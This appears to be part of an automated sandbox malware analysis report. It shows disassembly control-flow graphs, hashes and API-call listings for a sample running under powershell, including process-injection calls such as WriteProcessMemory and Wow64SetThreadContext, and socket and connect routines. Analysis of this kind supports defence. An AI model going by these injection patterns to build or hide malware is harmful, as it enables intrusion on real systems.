630->638 641 76e0a36-76e0a42 631->641 642 76e0a44 631->642 643 76e0f69-76e0f6f 633->643 644 76e0f72-76e0f78 633->644 646 76e0f1b-76e0f1d 634->646 647 76e0f27-76e0f44 634->647 645 76e0dbb-76e0dbd 637->645 638->645 657 76e0c4b-76e0c4d 640->657 650 76e0a46-76e0a48 641->650 642->650 651 76e0f7e-76e0f8a 644->651 652 76e0f7a-76e0f7c 644->652 645->602 649 76e0dc3-76e0dc5 645->649 646->647 661 76e0faa-76e0faf 647->661 662 76e0f46-76e0f57 647->662 654 76e0ddf-76e0de3 649->654 655 76e0dc7-76e0dcd 649->655 650->560 658 76e0a4e-76e0a6e 650->658 659 76e0f8c-76e0fa7 651->659 652->659 665 76e0dfd-76e0e77 654->665 666 76e0de5-76e0deb 654->666 663 76e0dcf 655->663 664 76e0dd1-76e0ddd 655->664 667 76e0c4f-76e0c55 657->667 668 76e0c65-76e0cbc 657->668 684 76e0a86-76e0a8a 658->684 685 76e0a70-76e0a76 658->685 661->662 662->633 663->654 664->654 670 76e0def-76e0dfb 666->670 671 76e0ded 666->671 672 76e0c59-76e0c5b 667->672 673 76e0c57 667->673 670->665 671->665 672->668 673->668 686 76e0a8c-76e0a92 684->686 687 76e0aa4-76e0aa8 684->687 689 76e0a7a-76e0a7c 685->689 690 76e0a78 685->690 691 76e0a96-76e0aa2 686->691 692 76e0a94 686->692 693 76e0aaf-76e0ab1 687->693 689->684 690->684 691->687 692->687 695 76e0ac9-76e0b20 693->695 696 76e0ab3-76e0ab9 693->696 697 76e0abd-76e0abf 696->697 698 76e0abb 696->698 697->695 698->695
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$$^q$$^q
                                                                                                • API String ID: 0-2291298209
                                                                                                • Opcode ID: 5bbee92f0a6b3ca580540fc3c6c3bfff98b703412757ea86240686007ab2669d
                                                                                                • Instruction ID: 8c64a3c91943723c13990a423d7cf34aabd4ee4606166ccf9a8417374ecb7061
                                                                                                • Opcode Fuzzy Hash: 5bbee92f0a6b3ca580540fc3c6c3bfff98b703412757ea86240686007ab2669d
                                                                                                • Instruction Fuzzy Hash: 433128F060230A9FDF258E39C9107BA7BA9AF41654F3480A6D406CF296DBB5C985CB71

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 700 2fb9050-2fb90c9 701 2fb90cb-2fb90ce 700->701 702 2fb90d1-2fb90d8 700->702 701->702 703 2fb90da-2fb90e0 702->703 704 2fb90e3-2fb90f9 702->704 703->704 705 2fb90fb-2fb9101 704->705 706 2fb9104-2fb91a7 CreateProcessW 704->706 705->706 708 2fb91a9-2fb91af 706->708 709 2fb91b0-2fb9228 706->709 708->709 716 2fb923a-2fb9241 709->716 717 2fb922a-2fb9230 709->717 718 2fb9258 716->718 719 2fb9243-2fb9252 716->719 717->716 721 2fb9259 718->721 719->718 721->721
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02FB9194
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914736614.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2fb0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 4c7aef1061e12f940b4de2ea62fba29889efa53b16b82439b1a3ecd92f38f1f6
                                                                                                • Instruction ID: 0dbd0da25ec9f5ea2156e6935e114208c43196079f02d36fc74ab6520eb73285
                                                                                                • Opcode Fuzzy Hash: 4c7aef1061e12f940b4de2ea62fba29889efa53b16b82439b1a3ecd92f38f1f6
                                                                                                • Instruction Fuzzy Hash: 8C511671D0122ADFDB25CF99C940BDDBBB5BF48304F1484AAEA09B7250DB759A84CF90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 722 2fb9340-2fb9344 723 2fb92c6-2fb92d0 722->723 724 2fb9346-2fb93c6 722->724 725 2fb92dc-2fb9308 Wow64SetThreadContext 723->725 726 2fb92d2-2fb92da 723->726 732 2fb93c8-2fb93ce 724->732 733 2fb93cf-2fb93f0 724->733 728 2fb930a-2fb9310 725->728 729 2fb9311-2fb9332 725->729 726->725 728->729 732->733
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02FB92FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914736614.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2fb0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 467a76e481431f12d653abd7464af68bcfd577e47948a085a7f896dfa81b9761
                                                                                                • Instruction ID: d1480cf30510bf94efcde8de6cea975347130c6d91e40ed3c314854d3abaa785
                                                                                                • Opcode Fuzzy Hash: 467a76e481431f12d653abd7464af68bcfd577e47948a085a7f896dfa81b9761
                                                                                                • Instruction Fuzzy Hash: 724104B6D002099FDB10CF9AD944BDEBBF8EF48364F14842AE558A7250D378A544CFA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 735 2fb9400-2fb944e 736 2fb9458-2fb9491 WriteProcessMemory 735->736 737 2fb9450-2fb9456 735->737 738 2fb949a-2fb94bb 736->738 739 2fb9493-2fb9499 736->739 737->736 739->738
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02FB9484
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914736614.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2fb0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 5f20a1b4b7ec86c992704b26516bf75814208e31da2b7be43244bec4ea98286c
                                                                                                • Instruction ID: 2ed2bb6c78d2a01e9480090e43f477014c923176376a0bbba76e6526b1d713f4
                                                                                                • Opcode Fuzzy Hash: 5f20a1b4b7ec86c992704b26516bf75814208e31da2b7be43244bec4ea98286c
                                                                                                • Instruction Fuzzy Hash: AE21F3B1901249DFDB10CF9AD984BDEBBF4BB48364F10842AE558A7210D378A944CFA4

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 741 2fb9408-2fb944e 742 2fb9458-2fb9491 WriteProcessMemory 741->742 743 2fb9450-2fb9456 741->743 744 2fb949a-2fb94bb 742->744 745 2fb9493-2fb9499 742->745 743->742 745->744
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02FB9484
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914736614.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2fb0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 48fe12394f2d50b3f34f814eab0c1fd79046a42b2dd654d6613bb29d29adecb3
                                                                                                • Instruction ID: dd79b7638ccece59624cb2d67f79864ec3f1976aeb164bd1c5618f50975852dd
                                                                                                • Opcode Fuzzy Hash: 48fe12394f2d50b3f34f814eab0c1fd79046a42b2dd654d6613bb29d29adecb3
                                                                                                • Instruction Fuzzy Hash: CF21E4B1901359DFDB10CF9AC984BDEBBF4FB49364F10842AE658A7210D378A944CFA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 747 2fb9288-2fb92d0 749 2fb92dc-2fb9308 Wow64SetThreadContext 747->749 750 2fb92d2-2fb92da 747->750 751 2fb930a-2fb9310 749->751 752 2fb9311-2fb9332 749->752 750->749 751->752
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02FB92FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914736614.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2fb0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: ac5bab8a47ee865deb143c40390d724318534ec92e95d7999696a68b2486c750
                                                                                                • Instruction ID: a43e3e0770502bdc7973e5cdb14427c61f57b52038f3138084b2c627f370e10a
                                                                                                • Opcode Fuzzy Hash: ac5bab8a47ee865deb143c40390d724318534ec92e95d7999696a68b2486c750
                                                                                                • Instruction Fuzzy Hash: 131123B2D002499FDB10CFAAD944BDEFBF4AF88324F14C06AE558A3250D378A545CFA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 754 2fb9290-2fb92d0 756 2fb92dc-2fb9308 Wow64SetThreadContext 754->756 757 2fb92d2-2fb92da 754->757 758 2fb930a-2fb9310 756->758 759 2fb9311-2fb9332 756->759 757->756 758->759
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02FB92FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914736614.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2fb0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: b8f5b2dc06379d1efc18fe3e4657daf3cd6b1c0d1601a80519dbf027b5913441
                                                                                                • Instruction ID: 61b96b53be9d90bfaac1658e6709c916d574d623c0d9a194e751764bff779707
                                                                                                • Opcode Fuzzy Hash: b8f5b2dc06379d1efc18fe3e4657daf3cd6b1c0d1601a80519dbf027b5913441
                                                                                                • Instruction Fuzzy Hash: 2C11F0B2D002498FDB10CF9AC984BDEBBF8AB89264F14842AD558A3250D778A545CFA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1296 76e18b8-76e18e7 1297 76e18ff-76e1937 1296->1297 1298 76e18e9-76e18ef 1296->1298 1304 76e193e-76e1952 1297->1304 1299 76e18f3-76e18fd 1298->1299 1300 76e18f1 1298->1300 1299->1297 1300->1297 1305 76e197b-76e1982 1304->1305 1306 76e1954-76e1973 1304->1306 1307 76e1a2b-76e1a58 1305->1307 1308 76e1988-76e198d 1305->1308 1306->1305 1328 76e1a5d-76e1a71 1307->1328 1310 76e198f-76e1995 1308->1310 1311 76e19a5-76e19b1 1308->1311 1313 76e1999-76e19a3 1310->1313 1314 76e1997 1310->1314 1311->1307 1315 76e19b3-76e19ce 1311->1315 1313->1311 1314->1311 1319 76e19e8-76e1a29 1315->1319 1320 76e19d0-76e19d6 1315->1320 1319->1328 1321 76e19da-76e19e6 1320->1321 1322 76e19d8 1320->1322 1321->1319 1322->1319 1329 76e1a9a-76e1ad2 1328->1329 1330 76e1a73-76e1a92 1328->1330 1336 76e1ad3 1329->1336 1330->1329 1336->1336
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e32fb3d6f8be0df744de6cfad36669680880ee0f0cf8e1eff4cdc36f771b5fcd
                                                                                                • Instruction ID: 6f5ff54e4b880528c2e56dc5c5aaafada55835cde85deba9d3032b7293e3f40a
                                                                                                • Opcode Fuzzy Hash: e32fb3d6f8be0df744de6cfad36669680880ee0f0cf8e1eff4cdc36f771b5fcd
                                                                                                • Instruction Fuzzy Hash: 67517FB4B002089FDB14CBA9C454AAEBBF6EF89314F558069E8066F355CB72DC45CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 51976fa668de4c881a0c446f97d90cd8bd52ef6597f3715782b039d604956bb7
                                                                                                • Instruction ID: a7061709f7c73ee9656225bc29da2f0b34402e0fdc8ed7c398fa0d30fa156021
                                                                                                • Opcode Fuzzy Hash: 51976fa668de4c881a0c446f97d90cd8bd52ef6597f3715782b039d604956bb7
                                                                                                • Instruction Fuzzy Hash: 75515EB4A01208DFD714CB59C491ADEBBF6EF89314F558099D8066F351CB72EC45CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f838ed4ce30becf65de76256331f68be31c7e144b21b53da4b9f1dabbfceae14
                                                                                                • Instruction ID: d173f00911ae9ac9861204555b2a1bc7b2a3657871b7ee46b891a94053eaf440
                                                                                                • Opcode Fuzzy Hash: f838ed4ce30becf65de76256331f68be31c7e144b21b53da4b9f1dabbfceae14
                                                                                                • Instruction Fuzzy Hash: E601489118F3C04FD713A37469262C12F749EA322031A88D7D181CF2A7D8584D8AC7B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914144301.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2e9d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93d792bff7e427182197ebb53ac290a132af32052cfe8a43989e42ea342cdc81
                                                                                                • Instruction ID: c1fbc92f87da36594b583183e00703da8cd7c83349a7a7a720de1513a37715aa
                                                                                                • Opcode Fuzzy Hash: 93d792bff7e427182197ebb53ac290a132af32052cfe8a43989e42ea342cdc81
                                                                                                • Instruction Fuzzy Hash: 8801297100E3C09ED7128B258C94B92BFB4EF43228F19C1DBD9888F1A3C2699849C772
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914144301.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2e9d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4d577315d985dfabaf4d130dd2f23c0ad50a3eca3acab0b5d6a517a58705bce1
                                                                                                • Instruction ID: d0427bd47f1fb9324a1ad008046cfef6f2ff7280f85641ce2472653b20e13996
                                                                                                • Opcode Fuzzy Hash: 4d577315d985dfabaf4d130dd2f23c0ad50a3eca3acab0b5d6a517a58705bce1
                                                                                                • Instruction Fuzzy Hash: 75012B310483109AEB105A25CD847A7FFE9EF41328F18C52BED084B246C379D841C6B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                • Opcode ID: a90f36381696fa994445a1853ed066640768b01100780a769e216dd49e7ddd6f
                                                                                                • Instruction ID: 42a3522664a6c340139a8d26ebd5ab0e4ca776dea038f5fd1c894d11a90e5cb8
                                                                                                • Opcode Fuzzy Hash: a90f36381696fa994445a1853ed066640768b01100780a769e216dd49e7ddd6f
                                                                                                • Instruction Fuzzy Hash: AA5106B170530E9FCB294A7998106AB7BAA9BC3711F18847BD406CB391DE31C946D7B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$$^q$$^q
                                                                                                • API String ID: 0-2831958266
                                                                                                • Opcode ID: 069855a79874185462c2ffbe472410daebea2d70443fa1df2aef71c44b130bf4
                                                                                                • Instruction ID: 0d16c2aee58ab1645280677d285850e184f4d8608a3e0e71a30456f40ee67926
                                                                                                • Opcode Fuzzy Hash: 069855a79874185462c2ffbe472410daebea2d70443fa1df2aef71c44b130bf4
                                                                                                • Instruction Fuzzy Hash: C7110FB174B3554FCF3A16382C201B5AB7A9BC395073545A7C042DF35ACD654D4B87B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2125118731
                                                                                                • Opcode ID: f4c412d409087aa9c97c95aab9182d452e10e36a9c349ebb325daed12d4f0a90
                                                                                                • Instruction ID: 66658063f4f8f67facca62b2bdab13b5449e13cd6d7f075c90472c423b2e23e0
                                                                                                • Opcode Fuzzy Hash: f4c412d409087aa9c97c95aab9182d452e10e36a9c349ebb325daed12d4f0a90
                                                                                                • Instruction Fuzzy Hash: 9121C3F5E1230A9FDB348E64C940766B7EDAF81610F38417AD806AB345DBB1E445CBB2

                                                                                                Execution Graph

                                                                                                Execution Coverage:4.8%
                                                                                                Dynamic/Decrypted Code Coverage:4%
                                                                                                Signature Coverage:6.4%
                                                                                                Total number of Nodes:1794
                                                                                                Total number of Limit Nodes:69
                                                                                                execution_graph 52312 44eac6 52313 44ead1 52312->52313 52314 44eaf9 52313->52314 52315 44eaea 52313->52315 52318 44eb08 52314->52318 52334 455783 27 API calls 2 library calls 52314->52334 52333 445564 20 API calls _abort 52315->52333 52321 44bbce 52318->52321 52320 44eaef ___scrt_fastfail 52322 44bbe6 52321->52322 52323 44bbdb 52321->52323 52325 44bbee 52322->52325 52331 44bbf7 _strftime 52322->52331 52341 446d0f 21 API calls 3 library calls 52323->52341 52335 446cd5 52325->52335 52326 44bc21 RtlReAllocateHeap 52330 44bbe3 52326->52330 52326->52331 52327 44bbfc 52342 445564 20 API calls _abort 52327->52342 52330->52320 52331->52326 52331->52327 52343 442410 7 API calls 2 library calls 52331->52343 52333->52320 52334->52318 52336 446ce0 RtlFreeHeap 52335->52336 52337 446d09 _free 52335->52337 52336->52337 52338 446cf5 52336->52338 52337->52330 52344 445564 20 API calls _abort 52338->52344 52340 446cfb GetLastError 52340->52337 52341->52330 52342->52330 52343->52331 52344->52340 52345 426061 52346 426116 52345->52346 52351 426076 52345->52351 52347 426182 52347->52346 52349 4261a9 52347->52349 52361 425183 52347->52361 52348 4260c4 52348->52346 52357 4260f9 52348->52357 52374 41f280 54 API calls 52348->52374 52349->52346 52378 4257d2 28 API calls 52349->52378 52350 426130 52350->52346 52356 426165 52350->52356 52376 41f280 54 API calls 52350->52376 52351->52346 52351->52347 52351->52348 52351->52349 52351->52350 52351->52356 52351->52357 52373 42455f 50 API calls ctype 52351->52373 52356->52347 52377 424d86 21 API calls 52356->52377 52357->52346 52357->52350 52375 42455f 50 API calls ctype 52357->52375 52362 4251a2 ___scrt_fastfail 52361->52362 52364 4251b1 52362->52364 52367 4251d6 52362->52367 52379 41e2a2 21 API calls 52362->52379 52364->52367 52372 4251b6 52364->52372 52380 41fcdf 47 API calls 52364->52380 52367->52349 52368 4251bf 52368->52367 52387 424390 21 API calls 2 library calls 52368->52387 52370 425259 52370->52367 52381 4321a4 52370->52381 52372->52367 52372->52368 52386 41d179 50 API calls 52372->52386 52373->52348 52374->52348 52375->52350 52376->52350 52377->52347 52378->52346 52379->52364 52380->52370 52382 4321b2 52381->52382 52383 4321ae 52381->52383 52388 43aa9c 52382->52388 52383->52372 52386->52368 52387->52367 52393 446d0f _strftime 52388->52393 52389 446d4d 52396 445564 20 API calls _abort 52389->52396 52391 446d38 RtlAllocateHeap 52392 4321b7 52391->52392 52391->52393 52392->52372 52393->52389 52393->52391 52395 442410 7 API calls 2 library calls 52393->52395 52395->52393 52396->52392 52397 415836 52408 401d64 52397->52408 52399 41584b 52413 401fbd 52399->52413 52402 401d64 28 API calls 52403 415863 52402->52403 52404 401fbd 28 API calls 52403->52404 52405 41586b 52404->52405 52417 411bc5 52405->52417 52410 401d6c 52408->52410 52409 401d74 52409->52399 52410->52409 52436 401fff 28 API calls 52410->52436 52414 401fcc 52413->52414 52437 402501 52414->52437 52416 401fea 52416->52402 52442 4041f1 52417->52442 52419 411bd9 52449 40428c connect 52419->52449 52423 411bfa 52513 4027cb 52423->52513 52425 411c04 52516 404468 52425->52516 52429 411c16 52535 4045d5 52429->52535 52432 401eea 26 API calls 52433 411c2c 52432->52433 52434 401eea 26 API calls 52433->52434 52435 411c34 52434->52435 52438 40250d 52437->52438 52440 40252b 52438->52440 52441 40261a 28 API calls 52438->52441 52440->52416 52441->52440 52443 404206 socket 52442->52443 52444 4041fd 52442->52444 52446 404220 52443->52446 52447 404224 CreateEventW 52443->52447 52551 404262 WSAStartup 52444->52551 52446->52419 52447->52419 52448 404202 52448->52443 52448->52446 52450 4043e1 52449->52450 52451 4042b3 52449->52451 52452 404343 52450->52452 52453 4043e7 WSAGetLastError 52450->52453 52451->52452 52476 4042e8 52451->52476 52552 404cbf 52451->52552 52509 4027ec 52452->52509 52453->52452 52454 4043f7 52453->52454 52457 4043fc 52454->52457 52459 4042f7 52454->52459 52589 41be81 30 API calls 52457->52589 52458 4042f0 52458->52459 52462 404306 52458->52462 52463 401f66 28 API calls 52459->52463 52460 4042d4 52556 401f66 52460->52556 52473 404315 52462->52473 52474 40434c 52462->52474 52466 404448 52463->52466 52465 40440b 52590 404c9e 28 API calls 52465->52590 52470 401f66 28 API calls 52466->52470 52469 404418 52472 401f66 28 API calls 52469->52472 52475 404457 52470->52475 52477 404427 52472->52477 52479 401f66 28 API calls 52473->52479 52586 42113f 56 API calls 52474->52586 52480 41a891 79 API calls 52475->52480 52584 42035c 27 API calls 52476->52584 52481 41a891 79 API calls 52477->52481 52483 404324 52479->52483 52480->52452 52484 40442c 52481->52484 52482 404354 52485 404389 52482->52485 52486 404359 52482->52486 52487 401f66 28 API calls 52483->52487 52488 401eea 26 API calls 52484->52488 52588 4204f5 28 API calls 52485->52588 52489 401f66 28 API calls 52486->52489 52490 404333 52487->52490 52488->52452 52492 404368 52489->52492 52493 41a891 79 API calls 52490->52493 52496 401f66 28 API calls 52492->52496 52497 404338 52493->52497 52494 404391 52495 4043be CreateEventW CreateEventW 52494->52495 52498 401f66 28 API calls 52494->52498 52495->52452 52499 404377 52496->52499 52585 41de20 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52497->52585 52500 4043a7 52498->52500 52501 41a891 79 API calls 52499->52501 52503 401f66 28 API calls 52500->52503 52504 40437c 52501->52504 52505 4043b6 52503->52505 52587 42079d 54 API calls 52504->52587 52507 41a891 79 API calls 52505->52507 52508 4043bb 52507->52508 52508->52495 52510 4027f8 52509->52510 52511 402e78 28 API calls 52510->52511 52512 402814 52511->52512 52512->52423 52622 401e9b 52513->52622 52515 4027d9 52515->52425 52517 40447b 52516->52517 52626 404be8 52517->52626 52519 404490 ctype 52520 404507 WaitForSingleObject 52519->52520 52521 4044e7 52519->52521 52523 40451d 52520->52523 52522 4044f9 send 52521->52522 52524 404542 52522->52524 52630 420725 56 API calls 52523->52630 52527 401eea 26 API calls 52524->52527 52526 404530 SetEvent 52526->52524 52528 40454a 52527->52528 52529 401eea 26 API calls 52528->52529 52530 404552 52529->52530 52531 401eea 52530->52531 52533 4021b9 52531->52533 52532 4021e8 52532->52429 52533->52532 52636 40262e 52533->52636 52538 4045ec 52535->52538 52536 43aa9c ___std_exception_copy 21 API calls 52536->52538 52538->52536 52539 40465b 52538->52539 52545 401eea 26 API calls 52538->52545 52644 401f86 52538->52644 52648 401eef 52538->52648 52652 404688 52538->52652 52665 40455b 59 API calls 52538->52665 52539->52538 52541 404666 52539->52541 52666 4047eb WaitForSingleObject 52541->52666 52545->52538 52546 401eea 26 API calls 52547 404676 52546->52547 52548 401eea 26 API calls 52547->52548 52549 40467f 52548->52549 52549->52432 52551->52448 52553 404ccb 52552->52553 52591 402e78 52553->52591 52555 404cee 52555->52460 52557 401f6e 52556->52557 52600 402301 52557->52600 52560 41a891 52561 41a942 52560->52561 52562 41a8a7 GetLocalTime 52560->52562 52564 401eea 26 API calls 52561->52564 52563 404cbf 28 API calls 52562->52563 52565 41a8e9 52563->52565 52566 41a94a 52564->52566 52609 405ce6 52565->52609 52567 401eea 26 API calls 52566->52567 52569 41a952 52567->52569 52569->52476 52570 41a8f5 52571 4027cb 28 API calls 52570->52571 52572 41a901 52571->52572 52573 405ce6 28 API calls 52572->52573 52574 41a90d 52573->52574 52612 406478 76 API calls 52574->52612 52576 41a91b 52577 401eea 26 API calls 52576->52577 52578 41a927 52577->52578 52579 401eea 26 API calls 52578->52579 52580 41a930 52579->52580 52581 401eea 26 API calls 52580->52581 52582 41a939 52581->52582 52583 401eea 26 API calls 52582->52583 52583->52561 52584->52458 52585->52452 52586->52482 52587->52497 52588->52494 52589->52465 52590->52469 52593 402e85 52591->52593 52592 402ea9 52592->52555 52593->52592 52594 402e98 52593->52594 52596 402eae 52593->52596 52598 403445 28 API calls 52594->52598 52596->52592 52599 40225b 26 API calls 52596->52599 52598->52592 52599->52592 52601 40230d 52600->52601 52604 402325 52601->52604 52603 401f80 52603->52560 52605 40232f 52604->52605 52607 40233a 52605->52607 52608 40294a 28 API calls 52605->52608 52607->52603 52608->52607 52613 404bc4 52609->52613 52611 405cf4 52611->52570 52612->52576 52614 404bd0 52613->52614 52617 40245c 52614->52617 52616 404be4 52616->52611 52618 402469 52617->52618 52620 402478 52618->52620 52621 402ad3 28 API calls 52618->52621 52620->52616 52621->52620 52623 401ea7 52622->52623 52624 40245c 28 API calls 52623->52624 52625 401eb9 52624->52625 52625->52515 52627 404bf0 52626->52627 52631 404c0c 52627->52631 52629 404c06 52629->52519 52630->52526 52632 404c16 52631->52632 52634 404c21 52632->52634 52635 404d07 28 API calls 52632->52635 52634->52629 52635->52634 52639 402bee 52636->52639 52638 40263b 52638->52532 52640 402bfb 52639->52640 52641 402c08 error_info_injector 52639->52641 52643 4015d8 26 API calls 2 library calls 52640->52643 52641->52638 52643->52641 52645 401f8e 52644->52645 52646 402325 28 API calls 52645->52646 52647 401fa4 52646->52647 52647->52538 52649 401efe 52648->52649 52651 401f0a 52649->52651 52679 4021b9 52649->52679 52651->52538 52656 4046a3 52652->52656 52653 4047d8 52654 401eea 26 API calls 52653->52654 52655 4047e1 52654->52655 52655->52539 52656->52653 52657 401eef 26 API calls 52656->52657 52658 401eea 26 API calls 52656->52658 52660 401fbd 28 API calls 52656->52660 52662 403b60 28 API calls 52656->52662 52683 411c38 52656->52683 52727 402654 52656->52727 52730 401ebd 52656->52730 52657->52656 52658->52656 52660->52656 52662->52656 52665->52538 52667 404805 SetEvent CloseHandle 52666->52667 52668 40481c closesocket 52666->52668 52669 40466d 52667->52669 52670 404829 52668->52670 52669->52546 52671 40483f 52670->52671 53284 404ab1 83 API calls 52670->53284 52673 404851 WaitForSingleObject 52671->52673 52674 404892 SetEvent CloseHandle 52671->52674 53285 41de20 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52673->53285 52674->52669 52676 404860 SetEvent WaitForSingleObject 53286 41de20 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52676->53286 52678 404878 SetEvent CloseHandle CloseHandle 52678->52674 52680 4021c6 52679->52680 52681 4021e8 52680->52681 52682 40262e 26 API calls 52680->52682 52681->52651 52682->52681 